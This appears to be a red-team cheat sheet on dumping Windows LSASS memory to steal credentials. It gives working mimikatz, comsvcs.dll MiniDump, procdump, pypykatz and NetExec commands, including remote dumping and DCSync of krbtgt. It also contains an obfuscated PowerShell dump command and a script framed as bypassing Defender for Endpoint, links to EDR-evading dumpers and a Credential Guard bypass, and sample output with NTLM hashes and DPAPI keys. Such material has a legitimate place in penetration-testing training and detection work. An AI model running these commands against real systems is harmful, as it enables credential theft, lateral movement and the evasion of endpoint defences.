LSASS secrets

Require Domain Admin or Local Admin Privileges on target

Task Manager Method

C:\htb> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 23196355 (00000000:0161f2c3)
Session           : Interactive from 4
User Name         : DWM-4
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/31/2021 3:00:57 PM
SID               : S-1-5-90-0-4
        msv :
        tspkg :
        wdigest :
         * Username : WINLPE-SRV01$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

<SNIP> 

Authentication Id : 0 ; 23026942 (00000000:015f5cfe)
Session           : RemoteInteractive from 2
User Name         : jordan
Domain            : WINLPE-SRV01
Logon Server      : WINLPE-SRV01
Logon Time        : 3/31/2021 2:59:52 PM
SID               : S-1-5-21-3769161915-3336846931-3985975925-1000
        msv :
         [00000003] Primary
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * NTLM     : cf3a5525ee9414229e66279623ed5c58
         * SHA1     : 3c7374127c9a60f9e5b28d3a343eb7ac972367b2
        tspkg :
        wdigest :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        kerberos :
         * Username : jordan
         * Domain   : WINLPE-SRV01
         * Password : (null)
        ssp :
        credman :

<SNIP>

Pass the Hash (PtH)

Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

SafetyKatz

GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub

SafetyKatz.exe "sekurlsa::ekeys"

BetterSafetyKatz

GitHub - Flangvik/BetterSafetyKatz: Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.GitHub

SharpKatz

https://github.com/jakobfriedl/precompiled-binaries/raw/main/Credentials/SharpKatz.exe

SharpKatz.exe --Command ekeys

Dumpert (Direct Syscalls and API unhooking)

GitHub - outflanknl/Dumpert: LSASS memory dumper using direct system calls and API unhooking.GitHub

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Rundll32.exe & Comsvcs.dll Method

tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, Minidump <lsass_process_id> C:\Users\Public\lsass.dmp full

LSASS PID in cmd: tasklist /svc

C:\Windows\system32> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    776 PlugPlay
svchost.exe                    804 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
fontdrvhost.exe                812 N/A

LSASS PID in powershell: Get-Process lsass

PS C:\Windows\system32> Get-Process lsass

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

LSASS dump:

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Transfer dump

Download - Exfiltration

Transfer over SMB - as for SAM secrets

SAM & LSA secrets

Exctract Credentials

$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 

INFO:root:Parsing file /home/peter/Documents/lsass.dmp
FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
	== MSV ==
		Username: bob
		Domain: DESKTOP-33E7O54
		LM: NA
		NT: 64f12cddaa88057e06a81b54e73b949b
		SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
		DPAPI: NA
	== WDIGEST [14ab89]==
		username bob
		domainname DESKTOP-33E7O54
		password None
		password (hex)
	== Kerberos ==
		Username: bob
		Domain: DESKTOP-33E7O54
	== WDIGEST [14ab89]==
		username bob
		domainname DESKTOP-33E7O54
		password None
		password (hex)
	== DPAPI [14ab89]==
		luid 1354633
		key_guid 3e1d1091-b792-45df-ab8e-c66af044d69b
		masterkey e8bc2faf77e7bd1891c0e49f0dea9d447a491107ef5b25b9929071f68db5b0d55bf05df5a474d9bd94d98be4b4ddb690e6d8307a86be6f81be0d554f195fba92
		sha1_masterkey 52e758b6120389898f7fae553ac8172b43221605

... SNIP ...

Netexec - CME - Remotely

Dump LSASS | NetExec

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy

nxc smb 192.168.255.131 -u administrator -p pass -M nanodump

nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz

nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"

SMB Module handlekatz: [*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz

SMB module procdump: [*] procdump Get lsass dump using procdump64 and parse the result with pypykatz

Procdump

See: https://beta.hackndo.com/remote-lsass-dump-passwords/

C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[15:25:45] Dump 1 initiated: C:\Tools\Procdump\lsass.dmp
[15:25:45] Dump 1 writing: Estimated dump file size is 42 MB.
[15:25:45] Dump 1 complete: 43 MB written in 0.5 seconds
[15:25:46] Dump count reached.

Load in Mimikatz and Pass The Hash - See Task Manager Method

TrickDump

GitHub - ricardojoserf/TrickDump: Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file... and generate the Minidump later!GitHub

MultiDump

GitHub - Xre0uS/MultiDump: MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly.GitHub

Obfuscated LSASS Dump

PS C:> start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}}
PS E:> &$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {  $_.FullName }), `#-99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full; Wait-Process -Id (Get-Process rundll32).id ;

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
  $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999
  9999999999999999999999999999999999999999999999999999999999999999999999999999
  9999999999999999999999999999999999999999999999999999999999999999999999999999
  999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process
   -Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt();

Parse dump

GitHub - powerseb/PowerExtractGitHub

Obfuscated LSASS dump commandBadOption.eu

RustiveDump

GitHub - safedv/RustiveDump: LSASS memory dumper using only NTAPIs, creating a minimal minidump, built in Rust with no_std and independent of the C runtime (CRT). It supports XOR encryption and remote file transmission.GitHub

LsassReflectDumping

GitHub - Offensive-Panda/LsassReflectDumping: This tool leverages the Process Forking technique using the RtlCreateProcessReflection API to clone the lsass.exe process. Once the clone is created, it utilizes MINIDUMP_CALLBACK_INFORMATION callbacks to generate a memory dump of the cloned processGitHub

RtlCreateProcessReflection

GitHub - wolfcod/lsassdump: lsassdump via RtlCreateProcessReflection and NanoDumpGitHub

ShadowDumper

GitHub - Offensive-Panda/ShadowDumper: Shadow Dumper is a powerful tool used to dump LSASS memory, often needed in penetration testing and red teaming. It uses multiple advanced techniques to dump memory, allowing to access sensitive data in LSASS memory.GitHub

MiniDumpDotNet

GitHub - WhiteOakSecurity/MiniDumpDotNetGitHub

.\minidumpdotnet.exe <LSASS_PID> <minidump_file>

tasklist /v to enumerate LSASS PID is detected by EDR

FindLSASSPID.cpp

// Find PID of a process by name
int FindPID(const char* procname)
{
	int pid= 0;
	PROCESSENTRY32 proc = {};
	proc.dwSize= sizeof(PROCESSENTRY32);
	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);bool bProc= Process32First(snapshot, &proc);
	while (bProc)
	{
		if (strcmp(procname, proc.szExeFile) == 0)
		{
			pid= proc.th32ProcessID;
			break;
		}
		bProc= Process32Next(snapshot, &proc);
	}
	return pid;
}

Nanodump

GitHub - fortra/nanodump: The swiss army knife of LSASS dumpingGitHub

POSTDump

GitHub - YOLOP0wn/POSTDumpGitHub

Powershell - Bypass Defender for Endpoint

Defender for Endpoint: Bypassing Lsass Dump with PowerShellCYBERDOM

function Write-MemoryDump {
param(
[string]$outputPath
)

$processId = Get-ProcessId
if (-not $processId) { return $false }

try {
# Open target process
$processHandle = [System.Diagnostics.Process]::GetProcessById($processId).Handle
if (-not $processHandle) {
Write-Host “Failed to open target process with PID: $processId”
return $false
}
Write-Host “Successfully opened target process with PID: $processId”

# Create dump file
$fileStream = [System.IO.File]::Open($outputPath, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write)
$fileHandle = $fileStream.SafeFileHandle.DangerousGetHandle()
Write-Host “Dump file created at $outputPath”

# Write memory dump
$success = [DumpGenerator]::MiniDumpWriteDump(
$processHandle,
[uint32]$processId,
$fileHandle,
[uint32]$FullMemoryDump,
[IntPtr]::Zero,
[IntPtr]::Zero,
[IntPtr]::Zero
)

# Close file stream and release process handle
$fileStream.Close()
[System.Runtime.InteropServices.Marshal]::Release($processHandle)
if ($success) {
Write-Host “Memory dump successfully written to $outputPath”
return $true
} else {
Write-Host “Failed to write memory dump.”
return $false
}
} catch {
Write-Host “An error occurred: $_”
return $false
}
}

Lsass-Shtinkering

Works on Windows 10, Server 2022 - Not working on Server 2019

GitHub - deepinstinct/Lsass-ShtinkeringGitHub

Go-lsass

GitHub - jfjallid/go-lsass: Tool to aid in dumping LSASS process remotelyGitHub

Blindsight

GitHub - 0xdea/blindsight: Red teaming tool to dump LSASS memory, bypassing basic countermeasures.GitHub

AxiomDumper

GitHub - mallo-m/AxiomDumper: Lsass dumper evading (some) EDR detectionGitHub

Bypass Credential Guard

Credential Guard is a virtualization-based isolation technology for LSASS which prevents attackers from stealing credentials that could be used for pass the hash attacks.

GitHub - ricardojoserf/NativeBypassCredGuard: Bypass Credential Guard by patching WDigest.dll using only NTAPI functionsGitHub